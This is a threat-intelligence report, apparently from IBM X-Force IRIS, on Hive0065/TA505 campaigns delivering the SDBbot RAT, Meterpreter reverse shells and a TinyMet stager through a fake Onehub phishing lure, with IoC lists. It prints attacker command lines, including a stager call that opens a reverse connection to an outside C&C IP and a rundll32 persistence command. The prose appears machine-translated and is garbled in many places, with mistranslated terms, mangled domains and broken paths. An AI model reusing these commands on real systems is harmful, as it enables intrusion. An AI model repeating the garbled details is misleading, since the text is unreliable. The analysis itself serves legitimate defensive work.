IBM X-Force Incident Response and Intelligence Services (IRIS) responds to security incidents around the world. During the analysis and comparison of malicious activity on corporate networks, our team identified attacks probably linked to Hive0065, also called TA505. We have observed that Hive0065 continues to broadcast the SDBbot Remote Access Trojan (RAT) to other custom malware and continues to display the tactics used against businesses over the past year.
Attacks that deploy malware and RATs on targeted networks are a way for cybercrime groups to compromise networks and open channels for other activities, which may be immediate or may take place at a later stage. RATs are a common tool in targeted attacks because they allow a wide range of ranged actions for the attacker. These include deploying additional malware, spying on users, and performing actions from the infected device or server where they are installed.
Hive0065 is a financially motivated cybercrime group that has been actively targeting various industries, including finance, retail, and restaurants, since at least 2014. This group primarily conducts malicious spam campaigns providing a wide range of custom malware and open source. The most notorious are campaigns involving banking Trojans such as Dridex and TrickBot, ransomware such as Clop / Cryptomix and MINEBRIDGE, and extortion programs requiring payment in bitcoin.
Familiar SDBbot and TTP
In November 2019, X-Force IRIS observed a threat actor targeting employees of companies in Europe with a phishing e-mail spoofing the identity of Onehub, a legitimate cloud-based file sharing application for businesses. The email was designed to extract Active Directory (AD) discovery data and user credentials and to infect the environment with the SDBbot RAT. Based on our investigation and analysis of the actor’s tactics, techniques and procedures (TTP), their command and control infrastructure (C&C) and the use of specific malware previously attributed to the group, X-Force IRIS suspects that it is very likely that Hive0065 was behind the attacks.
SDBbot RAT has been observed in Hive0065 attacks since at least September 2019 and has been used primarily as a secondary payload. This malware has remote access capabilities, accepts commands from a C&C server such as video recording, and has the ability to exfiltrate data from victim devices and networks.
In a variety of campaigns attributed to this group previously reported by Proofpoint and ZeroFOX, Hive0065 conducted phishing campaigns that delivered malicious Excel (.XLS) files hosted on spoofed domains to appear as Sync and Dropbox cloud storage sites. The campaigns also included a C&C infrastructure that usurps other legitimate services, such as Google Drive and Microsoft Office.
More recent Hive0065 campaigns reported in March 2020 have exploited current interest in the COVID-19 pandemic, using coronavirus-themed phishing emails to deliver Locky ransomware and the Dridex banking Trojan. In some campaigns, Hive0065 has targeted healthcare organizations with emails purporting to be from medical research groups and offering so-called coronavirus remedies in exchange for bitcoin payments. The TTPs used in these campaigns align with those of Hive0065 / TA505, especially the spoofing of cloud storage websites to distribute malicious files.
Continuous malicious activity
Research during the X-Force IRIS investigations revealed continued malicious activity of Hive0065 which infected corporate networks with malware and the SDBbot RAT. The TTPs we found are consistent with the previous activity attributed to Hive0065:
- Spear phishing to deliver malware
- Documents compatible with macros
- The use of droppers containing built-in dynamic link libraries (DLLs)
- Using an installation component
- Using legitimate cloud hosting services for malware distribution
- Usurpation of legitimate services like Microsoft and Google
- Similar C&C domains in the naming convention and structure (example of domain names below)
Domains marked with X-Force |
Areas reported by Proofpoint |
Domains reported by ZeroFOX |
drm-server-booking[.]com |
google-news-server-drm[.com |
office in service[.]com |
microsoft-live-us[.]com |
update365-office-ens[.]com |
googledrive-download[.]com |
dl1.sync-share[.]com |
office365-update-en[.]com |
d1.syncdownloading[.]com |
Summary of the compromise
In order to access victim environments, Hive0065 sends malicious e-mail to employees claiming to come from the account of a human resources representative. The body of the email masqueraded as Onehub, prompting the recipient to download a malicious document named Resume.doc.
The employee who received this email downloaded and opened the document, which contained malicious code. Once the code was executed, a persistence mechanism was installed and a malicious password recovery system was executed. In this case, once the malicious code was executed, it deleted a malicious binary file (DLL) similar to CobaltStrike, which then created and executed additional files. The actor used the system initially compromised to increase privileges and move laterally on other systems on the network.
Hive0065’s arsenal of tools
VSPUB DLL with CobaltStrike Code Similarities
The malicious email delivering the named file Resume.doc initially led the recipient to a malicious domain. After multiple redirects, the final redirect pointed to the malicious URL hxxps: //dl1.sync-share[.]com? Or2at. In addition, we also observed employees who opened the document. hxxps: //dl1.sync-share[.]com and downloaded Resume (1) .doc and a second file, Resume (3) .doc.
Seconds later, a suspicious document named main_template.docx has been created.
Everytime main_template.docx has been opened, VBA macros have been executed and a fake Microsoft Office login window (FakeL.exe) was displayed to the user while a malicious payload was running in the background. If the password entered was correct, the display disappeared. Password attempts were written to a file named Password.txt, which was later deleted.
The document may also display the fake “This document is protected” message to prompt users to activate content and execute malicious code. The .docx file contained embedded x86 and x64 versions of the payload DLL so that the appropriate version is removed depending on the target operating system.
The DLLs have been placed in the following locations:
- x86:% APPDATA% Microsoft Windows Template vspub1.dll
- x64:% APPDATA% Microsoft Windows Template vspub2.dll
The DLLs have been loaded into the memory space of winword.exe using the LoadLibraryW API and the DLL module was compressed twice to hide the actual code. He used a custom packer that decompresses UPX, an open source executable packer, which revealed the actual code.
Although these DLLs do not correspond to known and existing code families, a code comparison has shown that this code has similarities with the CobaltStrike framework. VSPUB DLLs gather system information and use HTTP POST requests to send it to the C&C domain microsoft-live-us[.]com / fidonet or IP address 185[.]176[.]221[.]45. The code suggests that upon successful response from the server, the DLL may download and execute additional files.
To note, microsoft-live-us[.]com was recorded a few days before the attack, with the domain synchronization sharing[.]com, to include subdomains dl1.sync-share[.]com, dl2.sync-share[.]com and dl3.sync-share[.]com. Synchronization sharing[.]com is probably an infrastructure belonging to an attacker, and although the dl2 and dl3 subdomains were not observed in this particular activity, it is likely that these domains will be used in the same way.
Meterpreter Reverse Shell
After the initial system was compromised, the actors compromised additional systems on the network by running malicious PowerShell services running as local SYSTEM, as well as installing link shells. A Meterpreter inverting shell was used to remotely control compromised systems within the internal network; it was installed as a service using the execution of an encoded PowerShell script. The malicious PowerShell command is decoded into a reverse shell connecting to two malicious IP addresses:
- 91[.]214[.]124[.]20
- 91[.]214[.]124[.]25
While most of the samples we found during our investigations were Meterpreter reverse shells connecting again to a C&C IP address, Meterpreter link shells that listen for incoming connections have also been discovered. We found that a domain administrator account was compromised and that the Active Directory PingCastle audit tool was running. Using the domain administrator, the actor was able to compromise several other accounts and execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders.
TinyMet Meterpreter Stager
The investigation led our team to discover a file named wsus.exe (a version of TinyMet, a tiny flexible Meterpreter stager), as well as three additional files that were created and executed on the first compromised system.
During the investigation, TinyMet was observed running with the command c: intel wsus.exe 1 91.214.124[.]20 43434, indicating a reverse HTTP connection, and connected to a malicious IP address by renaming a binary or by supplying specific arguments. The commands executed were used for discovery purposes, listing members of privileged groups and network information.
SDBbot RAT
SDBbot RAT installer
X-Force IRIS found that the installation programs of SDBbot RAT are filled x64 and decrypt parts of the code and strings of SDBbot during their execution. In addition, they read a binary blob located in the registry HKLM \ MACHINE \ SOFTWARE \ Microsoft \[3 characters][1 character]. Depending on user privileges, a binary blog can be found in the registry value. If regular user privileges are running, the installation component will establish persistence using the registry Run and run the ordinal # 1 of the DLL:
rundll32 “C: Users [USER] AppData Roaming xrjkrobuy.dll “, # 1
SDBbot RAT Loader
As part of the investigation, X-Force IRIS found that the SDBbot RAT loader that we analyzed was similar in nature to the version analyzed by Proofpoint, which was defined as the “loader component” of SDBbot in Hive0065 campaigns of October 2019. The loader component will read the binary blob and execute the contained shellcode. Once the shellcode is executed, it decompresses and executes the SDBbot payload. The shellcode will check if it was executed earlier than the loader DLL files and if it is “TRUE”, the process is complete.
SDBbot RAT Payload
Once the attackers gained a foothold on the network, four new registry keys on the local software hive were created and the DLL files for the SDBbot RAT loader were installed as persistence mechanisms; the chargers were injected into the process winlogon.exe each time the process has been run.
At runtime, SDBbot RAT checks for the presence of the mutex windows_7_windows_10_check_running_once_mutex and proceeds to recover a C&C address from the file C: ip.txt. If this file is not available, it will use C&C drm-server-booking[.]com as the default server. SDBbot RAT then collects system information and communicates with the C&C server by sending and receiving a DWORD: 0xC0DE0000. The C&C will send additional arguments depending on the order.
Conclusion
Hive0065 has been active since at least 2014, adjusting its TTP, its targeting and its infrastructure for each campaign. A relatively recent addition to Hive0065’s toolbox, SDBbot, is used in attacks primarily as second-stage malware, consisting of an installer, loader, and RAT components.
SDBbot has the ability to perform typical RAT functions, such as communicating with C&C, receiving commands, and obtaining system information. On infected systems, this malware could provide attackers with an extended ability to delete and execute additional malicious payloads, control infected systems, and perform actions to which the legitimate user would have access. Remote access Trojans are one of the most common tools in targeted attacks because they facilitate this type of control for remote attackers.
As X-Force IRIS continues to follow Hive0065, we expect this group to continue to target a wide range of industries using social engineering to deliver open source and custom malware while constantly adjusting TTP and C&C infrastructure. to escape detection.
Compromise indicators (IoCs)
C&C IP addresses
- 91[.]214[.]124[.]25
- 91[.]214[.]124[.]20
- 185[.]176[.]221[.]45
C&C domains
- drm-server-booking[.]com
- microsoft-live-us[.]com
- dl1.sync-share[.]com
URL redirection
- https: //eur01.safelinks.protection.outlook[.]com /? url = https: //clck.ru/JnFFT&data=02 | 01 || bed42450519b40df4d8808d762bd4ff1 | d847080b33824b27886012fe4d8edb27 | 1 | 0 | 637086437565223782 & sdata = 0VDHFFVSF
- https: // clck[.]ru / JnFFT
- https://sba.yandex[.]net / redirect? url = https% 3A% 2F% 2Fdl1.sync-
- share.com% 3FOr2at & client = clck & sign = 2a3f3d25a38344769c6cfb6705a0f918 ′
Final redirect hosting a malicious document
- https: //dl1.sync-share[.]com? Or2at
Files
File name |
SHA1 |
The description |
main_template.docx |
33094acd614825a916b77df6c5141c088fc3768b |
Malicious document |
vspub1.dll |
bf0f7abda2228059bb00ec9658ee447fbe84d277 |
Similarities CobaltStrike |
vspub2.dll |
d40510da42a478d72e649993208710668a7f6c27 |
Similarities CobaltStrike |
xrjkrobuy.dll |
14f52ae68344e1643b3066c10f7044fdd819db4e |
SDBot RAT |
upywloeza.dll |
0cc7cca16afd632857e3883c06b2f55c057b563e |
SDBot RAT |
dtzvlbtxn.dll |
d36e983886a084887f887c6d562d3bc0664587c4 |
SDBot RAT |
lvgoywrnxwy.dll |
fea7d944e317c7b2ef1aba57600a8c5310368085 |
SDBot RAT |
qcuqqgxmy.dll |
35423e04e58ab1f2267e19c47e1c69ea5b7041cc |
SDBot RAT |
pdxqzmftr.dll |
fd9620c0c295caaee3096423532bb1dbfb7064c5 |
SDBot RAT |
lowpro3.13.exe |
cb0b39534d99057b02b090c3650fb1de43d19a02 |
Binary |
wsus.exe |
caff1d315a5d87014e5fa62346f58407755d971e |
Stager Meterpreter |
FakeL.exe |
45c43ec18d15ba7850e6ad2e2e54671636f4d926 |
Password thief |